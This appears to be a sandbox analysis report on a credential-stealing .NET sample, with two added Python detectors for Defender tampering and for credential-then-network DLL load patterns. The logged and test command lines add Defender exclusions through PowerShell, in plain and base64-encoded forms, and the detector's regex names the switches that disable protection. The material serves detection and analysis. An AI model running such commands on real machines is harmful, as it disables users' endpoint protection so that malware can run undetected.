                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock' (4 occurrences)
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, PrUsrswPYsf1O0VuSQ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, PrUsrswPYsf1O0VuSQ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.cs | Security API names: _0020.AddAccessRule
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@13/9@1/1
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Eschemyquote24573j33.exe.log
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Mutant created: \Sessions\1\BaseNamedObjects\PIcecqLkKY
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cycmogx.s02.ps1
                    Source: Eschemyquote24573j33.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Eschemyquote24573j33.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, Eschemyquote24573j33.exe, 00000004.00000002.4509927352.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2259031078.0000000003478000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2259031078.0000000003465000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4509557072.0000000003265000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4509557072.0000000003278000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Eschemyquote24573j33.exe | ReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | File read: C:\Users\user\Desktop\Eschemyquote24573j33.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\Eschemyquote24573j33.exe "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Users\user\Desktop\Eschemyquote24573j33.exe "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Users\user\Desktop\Eschemyquote24573j33.exe "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
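The process tree above shows the sample spawning powershell.exe with Add-MpPreference -ExclusionPath to whitelist itself in Defender. The command line is in the clear here, but the same cmdlet is often passed through -EncodedCommand (the case the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule in the signature list targets). The following detector is an added example, not part of the Joe Sandbox report: it runs over constructed process-creation events (the first mirrors the command line observed above; the second, with the hypothetical parent dropper.exe, is the encoded variant) and flags both forms.

```python
import base64
import re
from typing import List, Optional


def _encode_ps(script: str) -> str:
    # powershell.exe -EncodedCommand expects base64 of UTF-16LE text
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (Sysmon Event ID 1 / Security 4688 shape).
# Not taken from the sandbox report; only the first command line mirrors it.
SAMPLE_EVENTS: List[dict] = [
    {"parent": r"C:\Users\user\Desktop\Eschemyquote24573j33.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"'},
    {"parent": r"C:\Users\user\Desktop\dropper.exe",  # hypothetical parent
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
                + _encode_ps('Add-MpPreference -ExclusionProcess "dropper.exe"')},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-MpPreference"},  # read-only query, benign
]

# Add-/Set-MpPreference followed by an exclusion or a protection-disabling switch
MPPREF_RE = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-(?:Exclusion(?:Path|Process|Extension|IpAddress)"
    r"|DisableRealtimeMonitoring|DisableIOAVProtection|DisableBehaviorMonitoring)",
    re.IGNORECASE | re.DOTALL)
# -e, -ec, -enc, -EncodedCommand ...: PowerShell accepts any unambiguous prefix
ENC_RE = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_defender_tampering(event: dict) -> Optional[dict]:
    """Flag a PowerShell launch that adds a Defender exclusion or disables
    protection, whether the cmdlet is visible or base64-hidden."""
    if not event["image"].lower().endswith("powershell.exe"):
        return None
    candidates = [("plain", event["cmdline"]),
                  ("encoded", decode_encoded_command(event["cmdline"]))]
    for form, text in candidates:
        if text is None:
            continue
        m = MPPREF_RE.search(text)
        if m:
            return {"parent": event["parent"], "form": form, "cmdlet": m.group(0)}
    return None


def scan(events: List[dict]) -> List[dict]:
    return [f for f in map(detect_defender_tampering, events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

In production, key the rule on the parent image as well: a Defender exclusion added by an unsigned binary in a user-writable path (Desktop, AppData) is far more telling than the cmdlet alone, which administrators also run. Note that the sandbox spawned the SysWOW64 (32-bit) PowerShell here, so matching only the System32 path would miss it.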
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Sections loaded (first instance, in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Sections loaded (second instance, in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, ntmarta.dll, vaultcli.dll, wintypes.dll, edputil.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, mswsock.dll, rasadhlp.dll, fwpuclnt.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Sections loaded (in order): fastprox.dll, ncobjapi.dll, wbemcomn.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Sections loaded (first instance, in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Sections loaded (second instance, in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, edputil.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Sections loaded (third instance, in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Sections loaded (fourth instance, in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, edputil.dll
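The module-load lists above carry the stealer's behaviour in miniature: the injected second instances of both Eschemyquote24573j33.exe and ctsdvwT.exe load mscoree.dll (managed host), wbemcomn.dll (WMI client, matching the Win32_Processor queries) and vaultcli.dll (Credential Manager client), and the Eschemyquote24573j33.exe instance then brings up the network stack (iphlpapi.dll, dnsapi.dll, mswsock.dll, fwpuclnt.dll) after the vault client. The scorer below is an added example, not part of the report: it replays those sequences, as Sysmon Event ID 7 (ImageLoad) order would present them, and ranks each process. The DLL names are the report's; the per-process labels, the abridged powershell.exe and WmiPrvSE.exe lists, and the weights are assumptions made here.

```python
from typing import Dict, List

# Module-load order taken from the "Sections loaded" lists above. DLL names are
# the report's; labels and grouping are added here, and the last two lists are abridged.
OBSERVED_LOADS: Dict[str, List[str]] = {
    "Eschemyquote24573j33.exe (second instance)": [
        "mscoree.dll", "kernel.appcore.dll", "version.dll", "vcruntime140_clr0400.dll",
        "ucrtbase_clr0400.dll", "uxtheme.dll", "windows.storage.dll", "wldp.dll",
        "profapi.dll", "cryptsp.dll", "rsaenh.dll", "cryptbase.dll", "wbemcomn.dll",
        "amsi.dll", "userenv.dll", "sspicli.dll", "ntmarta.dll", "vaultcli.dll",
        "wintypes.dll", "edputil.dll", "iphlpapi.dll", "dnsapi.dll", "dhcpcsvc6.dll",
        "dhcpcsvc.dll", "winnsi.dll", "mswsock.dll", "rasadhlp.dll", "fwpuclnt.dll"],
    "ctsdvwT.exe (second instance)": [
        "mscoree.dll", "kernel.appcore.dll", "version.dll", "vcruntime140_clr0400.dll",
        "ucrtbase_clr0400.dll", "uxtheme.dll", "windows.storage.dll", "wldp.dll",
        "profapi.dll", "cryptsp.dll", "rsaenh.dll", "cryptbase.dll", "wbemcomn.dll",
        "amsi.dll", "userenv.dll", "sspicli.dll", "vaultcli.dll", "wintypes.dll",
        "edputil.dll"],
    "powershell.exe": ["atl.dll", "mscoree.dll", "amsi.dll", "wininet.dll", "wbemcomn.dll"],
    "WmiPrvSE.exe": ["fastprox.dll", "ncobjapi.dll", "wbemcomn.dll", "mpclient.dll"],
}

CLR_HOST = {"mscoree.dll"}      # managed code host (AgentTesla is a .NET stealer)
CREDENTIAL = {"vaultcli.dll"}   # Credential Manager / Windows Vault client
WMI_CLIENT = {"wbemcomn.dll"}   # WMI client, used here for hardware fingerprinting
NETWORK = {"dnsapi.dll", "mswsock.dll", "iphlpapi.dll", "wininet.dll", "winhttp.dll"}


def assess_loads(dlls: List[str]) -> dict:
    """Score one process's ImageLoad sequence. Weights are assumptions for the example."""
    seq = [d.lower() for d in dlls]
    first: Dict[str, int] = {}
    for i, name in enumerate(seq):
        first.setdefault(name, i)  # index of the first load of each module
    loaded = set(seq)
    score, reasons = 0, []
    if loaded & CLR_HOST:
        score += 1
        reasons.append("managed host")
    if loaded & WMI_CLIENT:
        score += 1
        reasons.append("WMI client")
    if loaded & NETWORK:
        score += 1
        reasons.append("network stack")
    if loaded & CREDENTIAL:
        score += 3
        reasons.append("Credential Manager client")
        # harvest-then-send: vault client loaded before the first network module
        net_first = [first[d] for d in NETWORK & loaded]
        cred_first = min(first[d] for d in CREDENTIAL & loaded)
        if net_first and cred_first < min(net_first):
            score += 2
            reasons.append("vaultcli.dll precedes network DLLs")
    verdict = "suspicious" if score >= 5 else "review" if score >= 3 else "low"
    return {"score": score, "verdict": verdict, "reasons": reasons}


def triage(loads: Dict[str, List[str]]) -> Dict[str, str]:
    """Verdict per process, e.g. for a quick pass over a Sysmon export."""
    return {proc: assess_loads(dlls)["verdict"] for proc, dlls in loads.items()}


if __name__ == "__main__":
    for proc, dlls in OBSERVED_LOADS.items():
        print(proc, assess_loads(dlls))
```

The scores are deliberately not a replacement for the sandbox verdict: powershell.exe legitimately loads mscoree.dll, wininet.dll and wbemcomn.dll and lands on "review" only because the heuristic knows nothing about the host image. In a real rule, baseline per image and restrict the vaultcli.dll condition to unsigned images in user-writable paths such as AppData\Roaming, which is exactly where ctsdvwT.exe lives.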
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Eschemyquote24573j33.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Eschemyquote24573j33.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Eschemyquote24573j33.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: BXgJ.pdb | source: Eschemyquote24573j33.exe, ctsdvwT.exe.4.dr
                    Source: Binary string: BXgJ.pdbSHA256+ | source: Eschemyquote24573j33.exe, ctsdvwT.exe.4.dr

                    Data Obfuscation

                    Source: Eschemyquote24573j33.exe, MainForm.cs | .Net Code: InitializeComponent
                    Source: 0.2.Eschemyquote24573j33.exe.293d9d8.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Eschemyquote24573j33.exe.5490000.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.cs | .Net Code: EAPqyhE53x System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Eschemyquote24573j33.exe.294a200.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.cs | .Net Code: EAPqyhE53x System.Reflection.Assembly.Load(byte[])
                    Source: Eschemyquote24573j33.exe | Static PE information: 0xDA4BC7FC [Sun Jan 20 21:11:24 2086 UTC]
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_04DD1760 pushfd ; iretd 0_2_04DD176E
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_04DDDDB0 push eax; mov dword ptr [esp], ecx 0_2_04DDDDC4
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F83F81 push E406F3A8h; retf 0_2_06F83F8D
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F81408 push es; iretd 0_2_06F81414
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_0526DDB0 push eax; mov dword ptr [esp], ecx 7_2_0526DDC4
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_07083F81 push E40703A8h; retf 7_2_07083F8D
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A53F81 push E40747A8h; retf 10_2_07A53F8D
                    Source: Eschemyquote24573j33.exe | Static PE information: section name: .text entropy: 7.8248096934652995
                    Source: 0.2.Eschemyquote24573j33.exe.293d9d8.1.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                    Source: 0.2.Eschemyquote24573j33.exe.293d9d8.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                    Source: 0.2.Eschemyquote24573j33.exe.5490000.5.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                    Source: 0.2.Eschemyquote24573j33.exe.5490000.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, UlyEHKDV3LaCLLom7F.cs | High entropy of concatenated method names: 'pH1nT0iaOY', 'FQNnEB4jwZ', 'hMWnUogfXy', 'QLYUxgPJ8s', 'oF7Uz4tlBf', 'K19nKoUx7B', 'A5tnNZEGNZ', 'PDNnZa4gaA', 'AC4nu0RQSL', 'nQhnqmZFJZ'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, hIgUhVm92GZDPRtBZs.cs | High entropy of concatenated method names: 'aEerNH6Pee', 'e1Crux6uG0', 'T7rrqU0eyk', 's7HrTZ4tfw', 'mCDrJsHC5n', 'oL5rBfBvT2', 'DDnrU9fksV', 'YkD8Vr7oxG', 'uLP8AV5rwc', 'afE8iWwyid'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, tnUsWDzA62wbjJK7EM.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sQUr2Tcm5c', 'a9Zre2D0PL', 'Ue7rbCnods', 'pgwr5oOjgu', 'x4Rr8D34RW', 'lA6rrDWMI5', 'EXprOhZX7I'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, VWsQCrlF0Gyb1uODge.cs | High entropy of concatenated method names: 'eDv8TU0X3D', 'NDL8JxENm7', 'Q5X8EvdfPD', 'T0s8BeLCP7', 'yn48UXqALy', 'q578n3f8YE', 'msO83F7Vj0', 'tTb8GM1mb9', 's4y8tMaySv', 'Mub80LT52g'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, Kr6tTfhpAfgPwUsiHt.cs | High entropy of concatenated method names: 'Dispose', 'oOrNiYOKbf', 'w8MZm4XS2y', 'SrxDD81xHF', 's86NxNKYLD', 'QJLNzjicse', 'ProcessDialogKey', 'E9lZKtXedb', 'CWGZNT5rxG', 'CQwZZelvbL'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, xGr7Z2GEn7B188JC2j.cs | High entropy of concatenated method names: 'qii5AAueNq', 'fyX5xHhgZc', 'gI88Kh75ro', 'obf8N2wUcD', 'Djh59XZles', 'tmg5c3xJun', 'a7p5gweeln', 'TOX54Pe9Rk', 'aAF5H2EGrx', 'p2q5L91nxg'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, VY8MeekEpUrCIR70BG.cs | High entropy of concatenated method names: 'dTkEko97C5', 'YjOEFhMteY', 'nuDEjSZtYX', 'vmoERBXiTG', 'OnMEe9baGO', 'wDCEbEucwY', 'oDwE59Wkda', 'rQIE8lH3JX', 'voQErBa3bM', 'iEoEOMMKqC'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, HABTMne0v4CLRfMopA9.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C8rO44BB6u', 'hNyOHjeFHF', 'QxBOLoQMGh', 'fwbOvdv3f2', 'E47OQAiiwx', 'iYsOap421y', 'lXKOVFcXrV'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, PrUsrswPYsf1O0VuSQ.cs | High entropy of concatenated method names: 'H4AJ4j3ilH', 'wsyJH4d698', 'MJaJLoZ7oY', 'RUlJvFRcV4', 'a5LJQ2g69H', 'FYtJad7KGm', 'X6AJVn4jSw', 'owoJAltLbl', 'GAVJitwjyS', 'hXXJx4GMn2'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, Y4AIJCVq0AJhyrGakh.cs | High entropy of concatenated method names: 'WSe8SZ3YF4', 'pti8mWX9em', 'vmZ8oqtDPE', 'hkb8WUToAC', 'A7f84TLLCY', 'xxe8ItRbog', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, xeO7gIW6JJoYZalNAu.cs | High entropy of concatenated method names: 'SHqnX5xpDD', 'yrqn6UQZpy', 'n99nyv3JvF', 'Tcknk910Ni', 'O23nl1DQiq', 'jvcnFbBPgv', 'TEFnCUUSFt', 'yFsnjrQFDE', 'Qb4nRV0JWX', 'QuRnMayd87'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, EeXc16K8feKegOUF9O.cs | High entropy of concatenated method names: 'zDwuy78Yq0GHpy02baO', 'NmcrW48t4xKZ5ETtqDB', 'BUkU83I4oM', 'v6iUrbcFMe', 'vd1UO1sF6l', 'tHtWgg85kIrTrMFsJv8', 'ycINcn8bJuHIaQB7d7P', 'tu0PNV8gRkNd9YOnaqE'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, vwPnnh1JETgPmNWxFh.cs | High entropy of concatenated method names: 'kH4ePI6d2w', 'ay0ec9sgde', 'SNee47thXv', 'AFIeHMbpLT', 'MIGemZPTPT', 'HbaeomHW6J', 'JiheWL44nK', 'sMIeIQeG1N', 'NGNeYJvkHT', 'EonepykAOn'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, QsbL7G6byXSclr7ntR.cs | High entropy of concatenated method names: 'QfYULBZAOE', 'JSeUv4Q8OK', 'RO9UQXHnKs', 'ToString', 'XkeUad4Yfw', 'ww3UVnAuxM', 'Jlry9P8avPvmYsH7kUq', 'dy0Uir8T4B5SaJE8191', 'r6TWWP8JqsdkxTFhbjw'
